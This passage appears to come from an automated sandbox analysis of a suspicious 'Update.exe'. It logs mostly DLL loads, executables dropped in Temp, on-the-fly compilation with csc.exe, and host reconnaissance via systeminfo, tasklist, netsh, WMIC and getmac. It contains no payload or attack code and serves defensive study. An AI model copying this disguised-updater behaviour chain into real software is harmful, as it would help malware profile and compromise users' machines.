                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Update.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: Update.exeStatic file information: File size 8514937 > 1048576
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
